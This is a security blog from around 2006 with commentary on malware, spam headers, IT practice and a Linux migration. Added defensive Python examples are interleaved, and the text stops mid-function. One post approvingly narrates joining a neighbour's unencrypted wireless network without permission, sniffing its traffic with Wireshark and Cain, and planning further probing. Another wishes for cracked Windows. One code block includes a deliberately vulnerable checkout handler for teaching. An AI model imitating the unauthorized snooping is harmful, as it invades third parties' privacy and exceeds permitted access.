So, where does MySpace fit in? The answer is, it doesn't. MySpace resembles web 0.5 with annoying embedded music, terrible designs, and atrocious layouts. It really is a modern GeoCities (now, there are many people with very nice-looking sites, but random browsing on MySpace is an exercise in ugly).

But so many people and bands and groups are posting there and using them to host their official sites. This means that MySpace either needs a makeover to become Web 2.0 compliant, or someone will take that space over and offer exactly what MySpace offers, only easier, prettier, slicker, sexier, and modern. Considering the "ugly" stigma that MySpace has, getting people onto a new service that is better shouldn't be much harder than Google toppling Yahoo back when Yahoo went out of style and Google was "it."

.: malware analysis: free video codec

This malware analysis is amazingly interesting to read. While not too deep, technically, this is the kind of analysis that is not really beyond any typical sysadmin or desktop support person.

A few points on why this is significant.

1) The malware is downloaded via social engineering someone to download a free codec in order to play some video. This is not atypical behavior; in fact, I see this every now and then on legitimate (non-porn) movies and happily go searching for codecs or just let it auto-check and install. A typical user will be fooled by this attempt, as could any user searching for the codec randomly (if you need a divx codec, you hit divx.com, you don't randomly search for and install the myriad odd "divx" codecs from mysterious sites).

2) The malware took over the DNS queries of the system and even actively took over browsing targets in IE. Could this malware also receive commands via DNS responses? It is definitely possible, as the analysis author mentions (I really like when authors illustrate just how bad things could get with a piece of malware), that false DNS responses can be given. You want Windows Update? No, you want our site to download false Updates with more malware! I'd really like to see some packet captures of the results, if they are abnormal in any way.

3) Just goes to show that if malware can get you to execute a file on your system, that system is no longer your system.

.: detecting virtualization

Running malware in a virtual machine is common for researchers looking to examine the effects and even reverse engineer the malware. This presentation goes into some of the new techniques associated with malware detecting the use of a virtual machine in order to stop execution and prevent reversing. Of note, if we can have malware execution stopped by virtual machines, could end users be a bit safer by using desktop systems as virtual machines (with a thin client front end)? Or perhaps will malware be able to specifically sniff out and target virtual machines if some vulnerability were found in the, say, virtualized drivers?

.: malware detects VM use and prevents execution

This presentation discusses new techniques associated with malware detecting the use of a virtual machine. Researchers typically examine malware on virtual machines. If malware can detect use of a virtual machine and then prohibit execution, reverse engineering the malware becomes a little bit more difficult. Could this mean running a thin client connected to a desktop virtual machine might be more secure? Perhaps, but I think it will be more likely to result in some really bad malware should any of the virtual drivers or virtualization software have any vulnerabilities discovered. It is a bit disappointing still that the virtual machines can be detected (beyond just the drivers saying "vmware display driver," for instance). Then again, it might be asking a little too much to expect VMs to be indistinguishable from physical systems.

.: sysadmin jokes for your manager

Just a couple ideas for office pranks on the managers.

1) Order up some jars or vases (the more magical or Aladdin-like the better, add in cork tops too!) and fill them with colored sand. Either solid colors or even do that cool layering for a more rainbow-like effect. Keep the jars of sand on your desk and label them: "Malware cleaning," "speed booster," "error fixing." Then when your manager comes by asking about an error or problem on a server, wordlessly choose the appropriate jar of sand and disappear into the server room...

2) Get a bit of white sand or salt and make a line of it on a server room desk (I don't recommend in your cube in case someone reports you!) like it is a line of cocaine. When the manager finds it or walks in while you're slaving away on some important downtime, let your manager know that they're driving you so hard you have to do cocaine just to keep things running.

.: linux as main box - part 6: oh to mount NTFS

I took the time needed to get Thunderbird all set up with my email on my Linux install. This was very easy since I use Thunderbird on Windows and was already quite familiar with the app. Good times!

I still need to get my hands on a legit or properly cracked (and still working) version of Windows XP Pro so that I can finish my VM install. I really want this so that I can run a few random little things that I need to run in Windows (like Ventrilo).

Next on my list is to iron out mounting my external hard drive with write access. The drive is saved in NTFS, a Windows standard. While there are tools and ways for Linux to write to NTFS properly, there are still (after numerous years) disclaimers saying that the whole drive may still get hosed up. So I need to dig out another drive and perform a full backup of this external drive. I need to do this anyway as it has been a while since I backed it up. Either way, this shouldn't be a huge deal. Copy data over, install the NTFS tools on Ubuntu, mount the drive, test out write/delete/move functions. Done!

I also started playing with the new tools that Linux opens up to me. I installed kismet and played with it a bit, far deeper than I've ever played with it before on livecds like BackTrack. I even got to figure out how to edit shortcuts, the Gnome desktop layout, and application menus. More good times!

.: more IT journalism

Sometimes I really get something in a bunch over the latest and greatest article that makes IT and IT security sound so easy on paper. I especially dislike reading about things like that from a journalist who may or may not even know how to implement and support the given steps and commentary. While I can't usually comment on their background and experience, sometimes it is pretty obvious when someone is writing about "good to haves" and "theoretical approaches" and "best-case scenarios." In reality, most companies will never match those steps.

Today's victim is an article on the 8 steps to a secure network found on zdnet.com.au.

1. Verify the current connections - Verifying the connections on the firewall is a good exercise, so that you know your common endpoints. Sadly, this works only in small networks that have tight control on installed software and desktops. In a large network, this will change too much to be of much use. In networks that do not have tight controls, you can have a few instances of Skype that will constantly be running suspicious connections to various places in China, Taiwan, Iceland, Denmark, and so on. Investigating these is just an exercise in wishing for tighter desktop controls. It might be better to look for some common destination ports like 22, 21, or some others that would be suspicious.

2. Look at network traffic statistics - This is a good step, and any network admin should be pulling these stats or at least checking the latest numbers every morning. Sadly, this is usually the realm of a specialized network device or a Linux box doing some traffic analysis, two things beyond the reach of many admins. However, if the aptitude on the team is such to get good numbers, this is an excellent step.

3. Look at your antivirus logs - Centralized logs for host-based antivirus are either something a smaller network would love to have or unnecessary traffic storms on larger networks. Network-based antivirus may be better suited here, or something on a chokepoint like the email servers. Checking for updated signatures should be mandatory, but checking for captured viruses is less interesting. Not only that, but the logs won't tell you the more important information: what wasn't caught by the signatures.

4. Read the security logs on your domain servers - Reading Windows event logs, particularly security logs, is about as bad a task as I can think of in IT and security. Hopefully anyone who has an interest in Windows security logs will be aggregating these somewhere and alerting when things like logon failures occur. If password policies are configured to properly lock out after 5 attempts and require admin intervention to unlock, this becomes more or less a waste of time.

5. Check for new security patches - As much as I might take exception to most of these steps, I do like this one. Keep an inventory of important systems and software and do regular rounds of checks on security updates. This doesn't need to happen every day, however. And hopefully you are controlling and know what is on your network...if not, good luck in getting everything adequately patched.

6. Meet and brief managers - Most of the time, the above 5 steps aren't going to be terribly interesting. Step 1 might be interesting only because of the sheer number of "suspicious" connections that may or may not be around. Eventually this task will numb managers and the meetings will turn informal and then non-existent. I think it would be more efficient to do this once a week.

7. Check more logs - Ok, I think this author is envisioning someone doing this job and only this job. All they do is check logs and security patches, kind of like a junior NOC operator or something. IDS/IPS logs should be checked, yes, but typically they are less useful than someone checking Snort or running some robust Linux tools for analysis.

8. Turn knowledge into action - This is a good step, but should be part of every piece mentioned above anyway. Take your information and work to get better information, massage down the unnecessary information, implement changes like security patches, and research new tools to do all of these steps better.

conclusion - Overall, this sounds like a real cakewalk sort of job, and likely all that someone who followed these steps would be doing every day. Unfortunately, the reality is different and most admins seem to need to wear various hats or attend to other projects. These steps above are typically the first things to go when time is short. That's not ideal, but that's reality for most of us.
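An added example of what steps 1 and 4 look like once they are scripted rather than eyeballed (my code, not the zdnet article's): flag outbound connections from user desktops to watched ports such as 21 and 22, and count failed logons per account and source against the 5-attempt lockout threshold mentioned above. The connection table, the event lines and their flat one-line format are constructed for the example; the event IDs 529/528 (Windows 2000/XP/2003) and 4625 (Vista and later) are real.

```python
"""Two of the daily checks above, automated over constructed data (added example)."""
import re
from collections import Counter

# Step 1: outbound destination ports that deserve a second look from user desktops.
WATCHED_PORTS = {21: "ftp", 22: "ssh", 23: "telnet", 6667: "irc"}

# Constructed firewall connection table: (source host, destination ip, destination port, protocol).
CONNECTIONS = [
    ("ws-042", "203.0.113.10", 443, "tcp"),
    ("ws-042", "203.0.113.55", 22, "tcp"),
    ("ws-017", "198.51.100.9", 6667, "tcp"),
    ("srv-mail", "198.51.100.25", 25, "tcp"),
    ("ws-099", "203.0.113.77", 21, "tcp"),
    ("ws-099", "203.0.113.77", 53, "udp"),
]


def flag_outbound(connections, watched=WATCHED_PORTS, server_prefixes=("srv-",)):
    """Group connections from user hosts to watched TCP ports by source host."""
    hits = {}
    for src, dst, port, proto in connections:
        if src.startswith(server_prefixes) or proto != "tcp" or port not in watched:
            continue
        hits.setdefault(src, []).append((dst, port, watched[port]))
    return hits


# Step 4: failed logons. Lines below are constructed in an assumed flat export format
# (timestamp host event-id message user= src=), not a real Windows log layout.
FAILURE_EVENT_IDS = {"529", "4625"}   # bad password: Windows 2000/XP/2003 id and Vista+ id
EVENT_LINES = [
    "2006-12-04 08:01:12 DC01 529 Logon Failure: Bad password user=jsmith src=10.1.2.20",
    "2006-12-04 08:01:15 DC01 529 Logon Failure: Bad password user=jsmith src=10.1.2.20",
    "2006-12-04 08:01:19 DC01 529 Logon Failure: Bad password user=jsmith src=10.1.2.20",
    "2006-12-04 08:01:23 DC01 529 Logon Failure: Bad password user=jsmith src=10.1.2.20",
    "2006-12-04 08:01:27 DC01 529 Logon Failure: Bad password user=jsmith src=10.1.2.20",
    "2006-12-04 08:03:02 DC01 528 Successful Logon user=jsmith src=10.1.2.20",
    "2006-12-04 08:10:44 DC01 529 Logon Failure: Bad password user=bob src=10.1.2.31",
    "2006-12-04 08:10:50 DC01 529 Logon Failure: Bad password user=bob src=10.1.2.31",
    "2006-12-04 08:12:00 DC02 4625 An account failed to log on user=admin src=10.1.2.99",
    "this line is not an event record",
]
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<host>\S+) (?P<eid>\d+) .*?user=(?P<user>\S+) src=(?P<src>\S+)$")


def failed_logons(lines, threshold=5):
    """Count failures per (user, source) and return those at or above the lockout threshold,
    plus the number of lines the parser could not read (silent parse failures hide attacks)."""
    counts = Counter()
    unparsed = 0
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            unparsed += 1
            continue
        if m["eid"] in FAILURE_EVENT_IDS:
            counts[(m["user"], m["src"])] += 1
    alerts = {key: n for key, n in counts.items() if n >= threshold}
    return alerts, unparsed


if __name__ == "__main__":
    for host, conns in flag_outbound(CONNECTIONS).items():
        print(host, conns)
    alerts, bad = failed_logons(EVENT_LINES)
    print(alerts, f"({bad} unparsed lines)")
```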

.: RE: small business IT

Andy has an awesome post about the realities of small business IT. IT infrastructure is expensive, let alone trying to implement IT in a secure and scalable and proper way. Also let alone trying to afford staff or consultants to support that IT and security. This puts pressure on individuals, small companies, and even mid-sized business to spend that sort of money or accept risks. This puts more emphasis on lightweight and open source tools. Which puts more emphasis on IT staff with those kinds of skills. Which puts more weight on paying their salaries.

As Andy says, even implementing the most basic things like backups can be difficult and painful.

Ahh, the continuing conundrums of IT security.

.: what makes a good it professional?

Locutus has an awesome post about what he feels makes a good IT professional, and I totally agree with him. Here is a quick summary in his presented order:

1) A passion for the work
2) Ability to solve problems and research solutions
3) Ability to solve problems and research solutions with time and organizational pressure

I like his first point the most, as it is what I call the "geek" trait. I'm a computer geek meaning work is also my hobby is also my enjoyment. My tinkering with technology does not stop at 5pm nor start at 8am. It bleeds into every part of my day and life for the most part.

This is the whole reason why I fight to have jobs where I can treat both "lives" as similar as possible. When at home, I don't wear a tie when ironing out a problem, so wearing one at work takes me out of my normal, and productive, state of comfort. (Not that I truly HATE it or something, it's just a little thing.) Likewise, I might have days where my productivity would be huge at home compared to at work, or at least huge when I'm happy. And if this is my hobby and what makes me happy, it follows to help me be happy at work so that I can be productive there as well.

Ok, end rant. :) I'm sure I'll complain about this until I actually have a job that doesn't require a tie 80%+ of the time...and even then wear one regularly.

.: more terms that are out of control

Just read here some more unnecessary security terms. "Evil twins" is already better described as a rogue AP. And "wireless phishing" is just lame.

Please, unless the method is brand new, don't invent more terms for things that already have terms, for all our sakes.

.: spam: the breakdown of trust in cyberspace

Sometimes even I get some spam mail that makes me blink and think for a moment. I received an email about an order I didn't make on Newegg.com, a site that I frequent fairly regularly. The email came to my email account registered on the site, and had no links, only an attached .pdf.exe file. I even logged into Newegg.com just to make sure there were no purchases. I then checked the headers on the email that purportedly came from info@newegg.com and it instead came through an email server at bunsen.com, which forwards over to the official web site of The Muppets. In checking records, yup, the originating server appears to be part of the go.com network, which is part of Disney. But in checking my mail server logs, I see this email actually came from a system on a cable connection in Turkey.
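The header walk just described, in code: an added example that is not part of the original post. It parses a constructed message modelled on that one (documentation-range addresses, a placeholder relay name instead of the real third party), lists the Received hops oldest first, reports whether the injecting host belongs to the claimed sender's domain, and flags attachments with an executable extension behind a second one like `.pdf.exe`. A second constructed message with a hop inside the sender's domain serves as the control case.

```python
"""Walk the Received chain of a suspicious message (added example, constructed messages)."""
import email
import re
from email import policy
from email.utils import parseaddr

# Constructed message modelled on the one described above: claimed sender newegg.com,
# handed in by an unnamed host at a documentation-range address, relayed through a
# placeholder third party, carrying a double-extension attachment.
SUSPICIOUS_MESSAGE = """\
Received: from mail.example.net (mail.example.net [10.0.0.5]) by mx.example.net with ESMTP; Mon, 4 Dec 2006 09:12:01 -0600
Received: from relay.bunsen.example (relay.bunsen.example [203.0.113.40]) by mail.example.net with SMTP; Mon, 4 Dec 2006 09:11:58 -0600
Received: from [198.51.100.23] (unknown [198.51.100.23]) by relay.bunsen.example with ESMTP; Mon, 4 Dec 2006 09:11:40 -0600
From: Newegg <info@newegg.com>
To: customer@example.net
Subject: Your order confirmation
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Your order has shipped. See the attached invoice.
--b1
Content-Type: application/octet-stream; name="invoice.pdf.exe"
Content-Disposition: attachment; filename="invoice.pdf.exe"
Content-Transfer-Encoding: base64

bm90IGEgcmVhbCBleGVjdXRhYmxl
--b1--
"""

# Control case: a constructed legitimate notice handed in by a host in the sender's own domain.
LEGIT_MESSAGE = """\
Received: from smtp1.newegg.com (smtp1.newegg.com [192.0.2.10]) by mx.example.net with ESMTP; Mon, 4 Dec 2006 10:00:00 -0600
From: Newegg <info@newegg.com>
To: customer@example.net
Subject: Your order has shipped
Content-Type: text/plain

Tracking number follows.
"""

RECEIVED_RE = re.compile(
    r"from\s+(?P<name>\S+)(?:\s+\((?P<rev>[^)\[]*?)\s*\[(?P<ip>[0-9a-fA-F.:]+)\])?", re.I)
RISKY_EXT = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd")


def received_chain(msg):
    """Hops oldest first as (claimed HELO name, receiver's reverse-DNS name, ip).
    Each relay prepends its own header, so the bottom one is the injection point."""
    hops = []
    for hdr in reversed(msg.get_all("Received", [])):
        m = RECEIVED_RE.search(str(hdr))
        if m:
            hops.append((m["name"], m["rev"], m["ip"]))
    return hops


def risky_attachments(msg):
    """Attachment file names ending in an executable extension (catches invoice.pdf.exe)."""
    names = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if name.endswith(RISKY_EXT):
            names.append(name)
    return names


def in_domain(name, domain):
    name = name.lower().strip("[]")
    return name == domain or name.endswith("." + domain)


def assess(raw):
    """Summarise where the message really entered the mail system versus who it claims to be from."""
    msg = email.message_from_string(raw, policy=policy.default)
    from_domain = parseaddr(str(msg["From"]))[1].rsplit("@", 1)[-1].lower()
    hops = received_chain(msg)
    origin = hops[0] if hops else (None, None, None)
    origin_names = [n for n in origin[:2] if n]
    return {
        "from_domain": from_domain,
        "origin_ip": origin[2],
        "origin_names": origin_names,
        "hop_ips": [h[2] for h in hops],
        # The injecting host should belong to the claimed sender; when neither its HELO
        # name nor its reverse DNS does, the From field cannot be trusted.
        "sender_domain_mismatch": not any(in_domain(n, from_domain) for n in origin_names),
        "risky_attachments": risky_attachments(msg),
    }


if __name__ == "__main__":
    for label, raw in (("suspicious", SUSPICIOUS_MESSAGE), ("legit", LEGIT_MESSAGE)):
        print(label, assess(raw))
```

Only the bottom Received header is written by your own server; everything below it in the chain is whatever the previous relay chose to write, which is why the IP your own logs recorded outranks the names in the headers.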

While we talk a lot about security and how things can be circumvented and broken, rarely do we get down deep enough to talk about how trust is being affected.

I cannot trust the content of email.
I cannot trust the values in the email fields.
I cannot always trust the headers shown to me when I dig deeper.
I cannot trust the sender.
I possibly cannot trust Newegg.com with my info.
I might have distrusted The Muppets and Go.com and Disney.
I might not trust dns and whois information.
I might distrust foreign servers.

In the end, sometimes you can only wrap yourself in the comfort of the trust implicit in the protocols underneath the Internet, the logs of the devices and services offered...which is typically beyond the reach of your average user...

.: linux as main box - part 7

My move to Linux as my main computer system is about 80% done, I think. That figure does not include things that don't run in Linux, like Ventrilo, some games, and Soulseek (p2p network). But the rest is coming along nicely.

I can now rip new cds using Grip. I have installed XChat for some IRC socializing (I had no idea there was a Windows version of XChat...yeesh). I found that GAIM will support GoogleTalk (Jabber) although it won't do voice chat. And I've shored up some problems with Totem and Mplayer not being able to play some media files like WMV files.

Basically just ironing out lots of little issues and problems this weekend. My external (NTFS) drive still is a bit picky. Sometimes I can write/delete files, but sometimes some files just won't delete. I'm tempted to just run a backup of the data, format the drive in FAT32, and be done with it. I know I'm not really utilizing the powers of NTFS on it anyway, even in Windows. A thought to toss around...in the meantime, I'm becoming more familiar with mount/umount.

.: humble predictions

The "next year" predictions has begun. McAfee issued their list of top threats for 2007. While they are driving their own market, they also take the easy road and state the obvious. It reminds me of the Top 20 Attack Targets from FBI/SANS which covered just about every broad base in the digital world that you can. Great, talk about useless.

For my part, rather than just rehash the same old, I thought I would just issue out some thoughts I had for the coming year and beyond, by going out on just a little bit more of a limb than saying, "spam will rise."

convergence of culture on security policy - In the coming year and years we will see more of our digital culture permeating every aspect of our lives, and workplace policies will need to adjust or become obsolete or even barriers to getting good talent. Web filtering, Email filtering, IM controls, device restrictions, and the like will all be challenged as the Internet generation continues to fill more and more roles in the workplace and the digital lifestyle fills up and moves beyond just personal time. Companies need to embrace these changes and technologies now, instead of waiting until the pot boils over. It might be tough to properly handle IM, but it should be started now anyway. And dare I mention continued DRM and copyright troubles? Naa, that's obvious.

pockets of wireless driver exploits - The wireless world did not see huge gains this year in tech, but it did collectively hold its breath for news on wireless driver vulnerabilities. Granted, we had to wait longer than expected, but they are obviously present. And who updates drivers anyway? (Only three groups in Windows: gamers, people reinstalling their system [albeit usually from a disc], and us geeks...a vast minority of users...) Because of this, and the continued trend for municipalities to roll out widespread wireless access, I expect some pockets of wireless exploits to be had, whether it be a muni, airport, or university or corporate campus. Considering how deep the vulnerabilities get and how often people do not update their drivers, I expect something like this to be wormable, especially from an airport or location where the infected laptops migrate offsite. Issues like this might not be found out for days, when it is too late.

Managed security and IT takes a strong hold - More and more companies will realize that IT and security is expensive. It is difficult to manage, and even more frustrating for the professionals who know what to do but don't have the time to perform the needed tasks, or for the professionals who don't know what to do but have to take time to become experts. Ask any pro who has had to juggle their daily tasks while also researching the viability of blades and/or virtual systems. Suddenly you have to be an expert. Why do all this when it can be outsourced or at least managed by a third party? And as this continues, the industry will grow as well, by realizing economies of scale and being able to best utilize expert knowledge and quality talent properly. Why should one awesome security pro manage only one client, when they might be able to effectively manage 5 with some extra hands to help? This is a classic case of mutual economic growth where companies will fuel this and providers will get better.

More disclosure debate - The disclosure debate will get hotter, especially just today with announcements of the Week of Oracle Bugs being cancelled due to some external pressures and Vista coming out. This debate will get ugly before it gets better, especially if something else comes out that really exposes government, critical infrastructures, or large swaths of people. And if people start exposing exploits, will someone finally sue for having spoken out about it? Should we pretend they don't exist until someone uses them and gets caught or detected? Hopefully this stays out of the mainstream media otherwise we're all in trouble.

laptop theft and data disclosure not going away - Ever since we've had laptops, we've had lost laptops and data on those laptops. The media keeps acting like this is some new amazing trend we've never seen before, but it is as old as the concept of possessions. This will not be going away because we continue to make laws to disclose losses, we get better at detecting and tracking these things, and the number of mobile devices and expectations of mobile work is still growing at a huge rate. I just hope the media stops reporting every single one, thus numbing everyone about it.

the rise of the browser - The web browser is already an over-powered computer application. It has become almost bigger than the OS itself, and will keep going until all you need is an OS and a web browser to access all you need. This is dangerous and illustrates how technology is pushed and pulled without regard to security. Web 2.0 has assured this.

the decline of the OS - The OS is slowly going to fall out of vogue. People hate upgrading and the insecurities, people don't want to pay money to have their known and accepted OS replaced with yet another interface that must be learned. And with the rise of the browser, there is a very real chance that security just gives up on the end system and moves security into the network. Next year will be a dangerous time for the OS and browser, and Vista right now holds the reins.

Mac will have malware - The Mac will finally get hit with some definitive malware, which can finally shut up all the Mac fan boys (my next laptop will be a Mac) who keep dodging around and protecting their precious "no malware on Mac" claims. This will occur next year, and we can all finally move on with life and get some great things done without this marketing zealotry always muddying the waters of the blogs and media.

.: why security will move to the network

Saturday saw me working most of the day on some productive stuff. On my test server I was finally able to install compatible and updated versions of Apache, MySQL, PHP, and Perl along with a new version of Movable Type. And I got it all to play nicely and properly render my website in full. Finally PHP and Apache2 ironed their issues out and I can proceed with my upgrades.

But this reminds me of the futility of trying to maintain a server and network in terms of security, and I don't even have all that much stuff installed.

My old server is a Windows 2000 Pro system that would have a 100% uptime if not for power outages and apartment moves (and update reboots). It runs MovableType1.2 I think, with 4 year old versions of PHP and Perl, a year old version of Blosxom, and Apache 1.3. I've not really updated the system itself in about 4+ years. That's heavy! And I'm a paranoid security guy who truly does know better!

Now, I will have updated versions of all of that, including a Wiki program. This means I need to keep up on:
- keeping my installs updated by applying any patches or security upgrades
- keeping my code secure by knowing how to program in a secure fashion
- remain an expert with all those technologies so that I know how to properly secure them
- for every update, be able to test it before putting into full production, or be able to spend time to recover when something royally screws up
- maintain resources for backing up the important stuff

My environment has two systems and a half dozen apps and a single OS version. And yet that's already a very big list of tasks up there. Just think how tough it is to be secure on a corporate level where every department has their own desires, software and web developers use their own systems to host things when they don't get their way on servers, and so on. It is no wonder that there are thousands of vulnerable forum sites out there running unupdated software. You can just wince when coming across an old forum site whose last 6000 posts are spam ads for Viagra.

Now, imagine turnover in the IT space. A 5-year vet of a company leaves and takes a heck of a lot of institutional knowledge with her. That might mean some systems have unknown software installed that no one else knows about, and no one else can manage. Imagine those things being used by someone for something critical, and by the time some issue arises, the company that created it (or internal developers) are no longer in business and support is not possible. Legacy is a very apt word for what we will go through as the years go by...legacy apps, systems, servers. It's not just hardware we need to worry about anymore, or bulky mainframes in basements.

Unless a corporation is very diligent and very controlling (which everyone resists vehemently), the application layer is becoming a lost battle. It is enough for IT divisions to attend to downtimes, connectivity, and failed hardware, let alone to stay abreast of the latest news on package Y or application X. And we can rest assured that we're also losing the battle of getting security packaged into software from the start.

As a side note, just think how much knowledge a true security pro needs. Not only do I need to know how to install and secure Apache, but I need to know how to break it too. I also need to know what is bad in php (i.e. I need to know how to code it). I need to keep up with all those areas and updates. I need to have intimate knowledge not just of the OS, the apps, and the code, but the countless interactions between them... Very, very heavy...

.: sysadmin of the year

The first Sysadmin of the Year awards have just been announced. While half the stuff said is likely embellished and it is just a little pat-on-the-back kind of site, I just thought it was interesting to see what these guys did that made their peers and co-workers nominate them.

I also would like to note that not one of them (with the Air Force exception) is wearing a tie to make them work better. Nor do any of them work for recognizable large-type corporations. These guys just plain "get things done" as opposed to running the gamut of business politics. And I would be willing to bet that every single one of these guys actually truly loves their job and company. Happiness == productive == successful.

.: are we there yet

I've seen a few "wide scope" posts lately about the state of security, but this one has some of the best points in it, and presents them very well. Mostly I just want to save this for my own use in the future.

Just one comment on it. Items 14 and 15 talk about how we cannot seem to agree, as a field, on best practices. Those points are illustrated in item 2 on disclosure practices. Many of us understand both sides of the equation and even the grey area in between, but yet we still fall on all sides of the debate. Sometimes there is really no universally correct answer...especially in such a complex field as IT and security.

.: decrypting wireless packets
I made a few discoveries this weekend. First, a wireless access point has popped up in my neighborhood recently that is not encrypted, as a quick test of Netstumbler showed me. Second, my newest used laptop appears to be equipped with an Atheros card. Oh joy! I might just have to dual-boot that guy into Linux!

I hopped on the wireless network to poke around, but the Netgear AP password had been changed, and the one other system on the network was sending very few packets across. In fact, all the packets I picked up, with few exceptions, were not being decoded by Wireshark properly. They keep coming up as a Belkin MAC and something about broken packets. I'm wondering if this is something like a Netgear/Belkin combination using proprietary "speed-boosting" which is mucking up the packets. I fired up the newest Cain as well, just in case something interesting flew by.

I'm not really sure since I've not seen it before, but I've left the laptop on the network and will check it out over the next week or two. I do have an Internet connection through it. Windows Network Neighborhood gave me the computer name which happens to be a girl's name, and the AP SSID was a last name. Tonight I need to check what IP I have so I can get the service provider and IP to do some external testing, although I suspect I won't find anything useful. Given some Google searches and any possible traffic that I can decrypt, that is quite a bit of information to leak already.

At any rate, it is fun to have a spare system that I can just dedicate to wireless stuff. I've been wondering what to do with the system, as it is a little too big to properly carry anywhere (about 10 lbs and only fits in my backpack) for real portability, especially since I have far lighter systems. But now I think I have at least one use for it as a wireless workhorse.
.: on security workarounds and knowledge
I am often amazed at some of the solutions to security problems that some organizations and people implement. A mailing list situation recently came through that had a web-based system developed to "hide" the URL bar from users so they couldn't see and/or manipulate the URL. This is almost certainly to obfuscate sensitive data in the URL and possibly avoid risk from manipulating that data (the classic www.domain.com?price=199 variable which can be changed to change the actual price). Now IE7 is out which forces the URL to be displayed. Kind of defeats some of that purpose, no?

Other times there can be some very creative ways to deal with security issues. SMTP "security" can be achieved by capturing emails with "SSN" in the body and saving them on the mail server for pickup by the recipient party. This really does not fix anything in SMTP or email, but rather just changes the path of the missive. Sadly, this is usually pretty annoying from the recipient's point of view.

These are sometimes just patches and workarounds to the real, deep issues of security. In the first example, the app should have been rewritten to display a sanitized URL. In the second, figure out a better way to utilize email or try to re-invent SMTP (hard sell, that).
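The price-in-the-URL problem above, shown in code as an added example (not from the original post): the handler that trusts whatever `price` the client sends, next to the fix of looking the price up server-side from the item id, plus an HMAC-signed query string for the cases where some state genuinely has to round-trip through the client. The catalogue, the URLs and the key are constructed for the demonstration.

```python
"""URL-parameter tampering: the vulnerable pattern beside two hardened forms."""
import hashlib
import hmac
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed sample catalogue; prices in cents so there is no float rounding.
CATALOGUE = {"sku-1001": 19900, "sku-1002": 4999}

# Constructed demo key; a real deployment loads it from a secret store.
SECRET_KEY = b"constructed-demo-key"


def _query(url):
    """Return the query string of a URL as a dict of single values."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {k: v[0] for k, v in qs.items()}


def checkout_trusting_url(url):
    """VULNERABLE: charges whatever price the client put in the URL."""
    params = _query(url)
    return int(params["price"])


def checkout_server_priced(url):
    """HARDENED: the URL only names the item; the price comes from the catalogue."""
    params = _query(url)
    sku = params.get("item")
    if sku not in CATALOGUE:
        raise ValueError("unknown item")
    return CATALOGUE[sku]


def sign_params(params, key=SECRET_KEY):
    """Build a query string carrying an HMAC over the parameters, so values
    that must travel through the client can be verified when they come back."""
    canonical = urlencode(sorted(params.items()))
    sig = hmac.new(key, canonical.encode(), hashlib.sha256).hexdigest()
    return canonical + "&sig=" + sig


def verify_params(query, key=SECRET_KEY):
    """Return the parameters if the signature matches, otherwise None."""
    parsed = parse_qs(query, keep_blank_values=True)
    sig = parsed.pop("sig", [None])[0]
    if sig is None:
        return None
    params = {k: v[0] for k, v in parsed.items()}
    canonical = urlencode(sorted(params.items()))
    expected = hmac.new(key, canonical.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        return None
    return params


if __name__ == "__main__":
    tampered = "https://shop.example/buy?item=sku-1001&price=1"
    print("trusting URL charges:", checkout_trusting_url(tampered))
    print("server-priced charges:", checkout_server_priced(tampered))
    signed = sign_params({"item": "sku-1001", "price": "19900"})
    print("signed query verifies:", verify_params(signed) is not None)
    print("edited query verifies:", verify_params(signed.replace("19900", "1")) is not None)
```

Hiding the URL bar changes none of this; only the server-side lookup (or a signature the server checks) does.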

I've found that there is an endless supply of creative and work-around ideas in the field of security, and I think a large part of that is a function of the skill in the field. As more and more auditors (people who check lists...), non-geeks, and barely competent IT support persons move into this field, the talent and skill gets a little bit more and more watered down. Instead of understanding the nuances and/or realities of a tool, too often shallow knowledge gives way to sometimes ill-conceived workarounds and obfuscations of issues.

It truly does take a technical and deeper knowledge to effectively and quickly determine security responses and measures (or how to beat them). Someone cannot take a position to secure DNS without understanding how DNS works. Likewise, how do you secure applications that depend on DNS when you don't even know DNS itself?

Web applications are teeming with this issue. If a developer knows how to program security into the product on the fly and codes with security in mind, that is a huge benefit over the developer who only knows how to make the functionality work (sometimes in equally ill-conceived ways), but then has to spend tons of time trying to bolt on security down the road. Knowledge would save time and money.

I think this is where a lot of bad security comes from, just a simple lack of expert level knowledge. This itself is tough to achieve anyway, as a security guru tends to be seen as a cost, not a value-add. They add value by also doing network/systems administration, which tends to trump security when push comes to shove.

And while budgets, poor management, poor decisions, and other things influence one's ability to be educated and/or implement solid security endeavors, I still think being an expert in the basics goes a long way. Why implement an expensive NAC solution when you can drop in an old box running arpalert (free) and check for rogue machines that way? Why spend hundreds of man-hours on limiting exposure of an application on the network when you can ensure your code can withstand fuzzing attacks?
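What the arpalert approach boils down to, as an added example (not arpalert's code and not from the original post): keep an allow-list of the MACs that belong on a segment, read the neighbour table, and raise an alert for any MAC you have never seen or any known IP that is suddenly answered by a different MAC. The allow-list and the `ip neigh`-style lines are constructed for the demonstration.

```python
"""Rogue-station detection over neighbour-table output, the idea behind arpalert."""
import re

# Constructed allow-list: the MACs we expect on the segment and the IP each
# should be using. arpalert's own "maclist" file plays this role.
KNOWN_STATIONS = {
    "00:11:22:33:44:55": "192.168.1.10",
    "00:11:22:33:44:66": "192.168.1.1",   # the gateway
}

# Constructed sample in the format `ip neigh show` prints on Linux.
SAMPLE_NEIGH = """\
192.168.1.10 dev eth0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.1 dev eth0 lladdr 00:11:22:33:44:66 STALE
192.168.1.50 dev eth0 lladdr 00:aa:bb:cc:dd:ee REACHABLE
192.168.1.1 dev eth0 lladdr 00:AA:BB:CC:DD:EE DELAY
192.168.1.77 dev eth0  FAILED
"""

NEIGH_RE = re.compile(
    r"^(?P<ip>\S+) dev (?P<dev>\S+) lladdr (?P<mac>[0-9A-Fa-f:]{17}) (?P<state>\S+)$"
)


def parse_neigh_line(line):
    """Return (ip, mac) for a resolved entry, None for FAILED/INCOMPLETE lines."""
    m = NEIGH_RE.match(line.strip())
    if not m:
        return None
    return m.group("ip"), m.group("mac").lower()


def check_neighbours(text, known=KNOWN_STATIONS):
    """Compare neighbour-table lines against the allow-list.

    Returns a list of (kind, ip, mac) alerts:
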